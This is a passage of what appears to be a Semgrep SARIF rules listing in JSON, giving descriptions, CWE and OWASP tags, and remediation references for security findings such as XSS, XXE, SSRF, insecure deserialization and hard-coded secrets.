[https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#cross-site-scripting-xss](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#cross-site-scripting-xss)\n - [https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.md](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.md)\n","text":"Detected data rendered directly to the end user via 'response' This bypasses Laravel's built-in cross-site scripting (XSS) defenses and could result in an XSS vulnerability. Use Laravel's template engine to safely render HTML."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-direct-response-write.laravel-direct-response-write","id":"php.laravel.security.laravel-direct-response-write.laravel-direct-response-write","name":"php.laravel.security.laravel-direct-response-write.laravel-direct-response-write","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-direct-response-write.laravel-direct-response-write"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-unsafe-entity-loader.laravel-unsafe-entity-loader)\n - [https://websec.io/2012/08/27/Preventing-XXE-in-PHP.html](https://websec.io/2012/08/27/Preventing-XXE-in-PHP.html)\n - [https://www.php.net/libxml_disable_entity_loader](https://www.php.net/libxml_disable_entity_loader)\n - [https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php](https://www.php.net/manual/en/function.libxml-set-external-entity-loader.php)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-unsafe-entity-loader.laravel-unsafe-entity-loader","id":"php.laravel.security.laravel-unsafe-entity-loader.laravel-unsafe-entity-loader","name":"php.laravel.security.laravel-unsafe-entity-loader.laravel-unsafe-entity-loader","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-unsafe-entity-loader.laravel-unsafe-entity-loader"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found SameSiteNoneMode setting in Gorilla session options. Consider setting SameSite to Lax, Strict or Default for enhanced security."},"help":{"markdown":"Found SameSiteNoneMode setting in Gorilla session options. Consider setting SameSite to Lax, Strict or Default for enhanced security.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.gorilla.security.audit.session-cookie-samesitenone.session-cookie-samesitenone)\n - [https://pkg.go.dev/github.com/gorilla/sessions#Options](https://pkg.go.dev/github.com/gorilla/sessions#Options)\n","text":"Found SameSiteNoneMode setting in Gorilla session options. Consider setting SameSite to Lax, Strict or Default for enhanced security."},"helpUri":"https://semgrep.dev/r/go.gorilla.security.audit.session-cookie-samesitenone.session-cookie-samesitenone","id":"go.gorilla.security.audit.session-cookie-samesitenone.session-cookie-samesitenone","name":"go.gorilla.security.audit.session-cookie-samesitenone.session-cookie-samesitenone","properties":{"precision":"very-high","tags":["CWE-1275: Sensitive Cookie with Improper SameSite Attribute","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: go.gorilla.security.audit.session-cookie-samesitenone.session-cookie-samesitenone"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Resources in the AWS subnet are assigned a public IP address. Resources should not be exposed on the public internet, but should have access limited to consumers required for the function of your application. Set `map_public_ip_on_launch` to false so that resources are not publicly-accessible."},"help":{"markdown":"Resources in the AWS subnet are assigned a public IP address. Resources should not be exposed on the public internet, but should have access limited to consumers required for the function of your application. Set `map_public_ip_on_launch` to false so that resources are not publicly-accessible.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-subnet-has-public-ip-address.aws-subnet-has-public-ip-address)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control/](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)\n - [https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/subnet#map_public_ip_on_launch](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/resources/subnet#map_public_ip_on_launch)\n - [https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-instance-addressing.html#concepts-public-addresses](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-instance-addressing.html#concepts-public-addresses)\n","text":"Resources in the AWS subnet are assigned a public IP address. Resources should not be exposed on the public internet, but should have access limited to consumers required for the function of your application. Set `map_public_ip_on_launch` to false so that resources are not publicly-accessible."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-subnet-has-public-ip-address.aws-subnet-has-public-ip-address","id":"terraform.aws.security.aws-subnet-has-public-ip-address.aws-subnet-has-public-ip-address","name":"terraform.aws.security.aws-subnet-has-public-ip-address.aws-subnet-has-public-ip-address","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-subnet-has-public-ip-address.aws-subnet-has-public-ip-address"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.browser.xss.xss)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input."},"helpUri":"https://semgrep.dev/r/javascript.browser.xss.xss","id":"javascript.browser.xss.xss","name":"javascript.browser.xss.xss","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.browser.xss.xss"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Using a non-primitive class with Java RMI may be an insecure deserialization vulnerability. Depending on the underlying implementation. This object could be manipulated by a malicious actor allowing them to execute code on your system. Instead, use an integer ID to look up your object, or consider alternative serialization schemes such as JSON."},"help":{"markdown":"Using a non-primitive class with Java RMI may be an insecure deserialization vulnerability. Depending on the underlying implementation. This object could be manipulated by a malicious actor allowing them to execute code on your system. Instead, use an integer ID to look up your object, or consider alternative serialization schemes such as JSON.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.rmi.security.server-dangerous-class-deserialization.server-dangerous-class-deserialization)\n - [https://mogwailabs.de/blog/2019/03/attacking-java-rmi-services-after-jep-290/](https://mogwailabs.de/blog/2019/03/attacking-java-rmi-services-after-jep-290/)\n","text":"Using a non-primitive class with Java RMI may be an insecure deserialization vulnerability. Depending on the underlying implementation. This object could be manipulated by a malicious actor allowing them to execute code on your system. Instead, use an integer ID to look up your object, or consider alternative serialization schemes such as JSON."},"helpUri":"https://semgrep.dev/r/java.rmi.security.server-dangerous-class-deserialization.server-dangerous-class-deserialization","id":"java.rmi.security.server-dangerous-class-deserialization.server-dangerous-class-deserialization","name":"java.rmi.security.server-dangerous-class-deserialization.server-dangerous-class-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.rmi.security.server-dangerous-class-deserialization.server-dangerous-class-deserialization"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"help":{"markdown":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.jose.security.jwt-none-alg.jwt-none-alg)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"helpUri":"https://semgrep.dev/r/javascript.jose.security.jwt-none-alg.jwt-none-alg","id":"javascript.jose.security.jwt-none-alg.jwt-none-alg","name":"javascript.jose.security.jwt-none-alg.jwt-none-alg","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.jose.security.jwt-none-alg.jwt-none-alg"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"help":{"markdown":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.jjwt.security.jwt-none-alg.jjwt-none-alg)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"helpUri":"https://semgrep.dev/r/java.jjwt.security.jwt-none-alg.jjwt-none-alg","id":"java.jjwt.security.jwt-none-alg.jjwt-none-alg","name":"java.jjwt.security.jwt-none-alg.jjwt-none-alg","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.jjwt.security.jwt-none-alg.jjwt-none-alg"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.net.tainted-django-http-request-boto3.tainted-django-http-request-boto3)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.django.net.tainted-django-http-request-boto3.tainted-django-http-request-boto3","id":"python.django.net.tainted-django-http-request-boto3.tainted-django-http-request-boto3","name":"python.django.net.tainted-django-http-request-boto3.tainted-django-http-request-boto3","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.net.tainted-django-http-request-boto3.tainted-django-http-request-boto3"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-pandas-hdf-flask.tainted-pandas-hdf-flask)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html](https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-pandas-hdf-flask.tainted-pandas-hdf-flask","id":"python.flask.deserialization.tainted-pandas-hdf-flask.tainted-pandas-hdf-flask","name":"python.flask.deserialization.tainted-pandas-hdf-flask.tainted-pandas-hdf-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-pandas-hdf-flask.tainted-pandas-hdf-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.diesel.mysql-connection-empty-password.mysql-connection-empty-password)\n - [https://docs.diesel.rs/master/diesel/index.html](https://docs.diesel.rs/master/diesel/index.html)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.diesel.mysql-connection-empty-password.mysql-connection-empty-password","id":"rust.secrets.diesel.mysql-connection-empty-password.mysql-connection-empty-password","name":"rust.secrets.diesel.mysql-connection-empty-password.mysql-connection-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.diesel.mysql-connection-empty-password.mysql-connection-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Possibility of prototype polluting function detected. By adding or modifying attributes of an object prototype, it is possible to create attributes that exist on every object, or replace critical attributes with malicious ones. This can be problematic if the software depends on existence or non-existence of certain attributes, or uses pre-defined attributes of object prototype (such as hasOwnProperty, toString or valueOf). Possible mitigations might be: freezing the object prototype, using an object without prototypes (via Object.create(null) ), blocking modifications of attributes that resolve to object prototype, using Map instead of object."},"help":{"markdown":"Possibility of prototype polluting function detected. By adding or modifying attributes of an object prototype, it is possible to create attributes that exist on every object, or replace critical attributes with malicious ones. This can be problematic if the software depends on existence or non-existence of certain attributes, or uses pre-defined attributes of object prototype (such as hasOwnProperty, toString or valueOf). Possible mitigations might be: freezing the object prototype, using an object without prototypes (via Object.create(null) ), blocking modifications of attributes that resolve to object prototype, using Map instead of object.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.audit.prototype-pollution.prototype-pollution-loop.prototype-pollution-loop)\n - [https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf)\n","text":"Possibility of prototype polluting function detected. By adding or modifying attributes of an object prototype, it is possible to create attributes that exist on every object, or replace critical attributes with malicious ones. This can be problematic if the software depends on existence or non-existence of certain attributes, or uses pre-defined attributes of object prototype (such as hasOwnProperty, toString or valueOf). Possible mitigations might be: freezing the object prototype, using an object without prototypes (via Object.create(null) ), blocking modifications of attributes that resolve to object prototype, using Map instead of object."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.audit.prototype-pollution.prototype-pollution-loop.prototype-pollution-loop","id":"javascript.lang.security.audit.prototype-pollution.prototype-pollution-loop.prototype-pollution-loop","name":"javascript.lang.security.audit.prototype-pollution.prototype-pollution-loop.prototype-pollution-loop","properties":{"precision":"very-high","tags":["CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes","LOW CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.audit.prototype-pollution.prototype-pollution-loop.prototype-pollution-loop"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Default routes are enabled in this routes file. This means any public method on a controller can be called as an action. It is very easy to accidentally expose a method you didn't mean to. Instead, remove this line and explicitly include all routes you intend external users to follow."},"help":{"markdown":"Default routes are enabled in this routes file. This means any public method on a controller can be called as an action. It is very easy to accidentally expose a method you didn't mean to. Instead, remove this line and explicitly include all routes you intend external users to follow.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-default-routes.avoid-default-routes)\n - [https://github.com/presidentbeef/brakeman/blob/main/docs/warning_types/default_routes/index.markdown](https://github.com/presidentbeef/brakeman/blob/main/docs/warning_types/default_routes/index.markdown)\n","text":"Default routes are enabled in this routes file. This means any public method on a controller can be called as an action. It is very easy to accidentally expose a method you didn't mean to. Instead, remove this line and explicitly include all routes you intend external users to follow."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-default-routes.avoid-default-routes","id":"ruby.rails.security.audit.xss.avoid-default-routes.avoid-default-routes","name":"ruby.rails.security.audit.xss.avoid-default-routes.avoid-default-routes","properties":{"precision":"very-high","tags":["CWE-276: Incorrect Default Permissions","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.avoid-default-routes.avoid-default-routes"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Checks for unsafe use of Object#send, try, __send__, and public_send. These only account for unsafe use of a method, not target. This can lead to arbitrary calling of exit, along with arbitrary code execution. Please be sure to sanitize input in order to avoid this."},"help":{"markdown":"Checks for unsafe use of Object#send, try, __send__, and public_send. These only account for unsafe use of a method, not target. This can lead to arbitrary calling of exit, along with arbitrary code execution. Please be sure to sanitize input in order to avoid this.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.no-send.bad-send)\n - [https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_send.rb](https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_send.rb)\n - [https://the.igreque.info/posts/2016/01-object-send-considered-harmful-en.html](https://the.igreque.info/posts/2016/01-object-send-considered-harmful-en.html)\n","text":"Checks for unsafe use of Object#send, try, __send__, and public_send. These only account for unsafe use of a method, not target. This can lead to arbitrary calling of exit, along with arbitrary code execution. Please be sure to sanitize input in order to avoid this."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.no-send.bad-send","id":"ruby.lang.security.no-send.bad-send","name":"ruby.lang.security.no-send.bad-send","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.no-send.bad-send"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.cassandra.ruby-cassandra-hardcoded-secret.ruby-cassandra-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/ruby.cassandra.ruby-cassandra-hardcoded-secret.ruby-cassandra-hardcoded-secret","id":"ruby.cassandra.ruby-cassandra-hardcoded-secret.ruby-cassandra-hardcoded-secret","name":"ruby.cassandra.ruby-cassandra-hardcoded-secret.ruby-cassandra-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.cassandra.ruby-cassandra-hardcoded-secret.ruby-cassandra-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the XML Parser it can result in XML External or Internal Entity (XXE) Processing vulnerabilities"},"help":{"markdown":"If unverified user data can reach the XML Parser it can result in XML External or Internal Entity (XXE) Processing vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.node-expat.security.audit.expat-xxe.expat-xxe)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"If unverified user data can reach the XML Parser it can result in XML External or Internal Entity (XXE) Processing vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.node-expat.security.audit.expat-xxe.expat-xxe","id":"javascript.node-expat.security.audit.expat-xxe.expat-xxe","name":"javascript.node-expat.security.audit.expat-xxe.expat-xxe","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","LOW CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.node-expat.security.audit.expat-xxe.expat-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"SSLv3 is insecure because it has known vulnerabilities. Starting with go1.14, SSLv3 will be removed. Instead, use 'tls.VersionTLS13'."},"help":{"markdown":"SSLv3 is insecure because it has known vulnerabilities. Starting with go1.14, SSLv3 will be removed. Instead, use 'tls.VersionTLS13'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.crypto.ssl.ssl-v3-is-insecure)\n - [https://golang.org/doc/go1.14#crypto/tls](https://golang.org/doc/go1.14#crypto/tls)\n - [https://www.us-cert.gov/ncas/alerts/TA14-290A](https://www.us-cert.gov/ncas/alerts/TA14-290A)\n","text":"SSLv3 is insecure because it has known vulnerabilities. Starting with go1.14, SSLv3 will be removed. Instead, use 'tls.VersionTLS13'."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.crypto.ssl.ssl-v3-is-insecure","id":"go.lang.security.audit.crypto.ssl.ssl-v3-is-insecure","name":"go.lang.security.audit.crypto.ssl.ssl-v3-is-insecure","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.crypto.ssl.ssl-v3-is-insecure"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected an element with disabled HTML escaping. If external data can reach 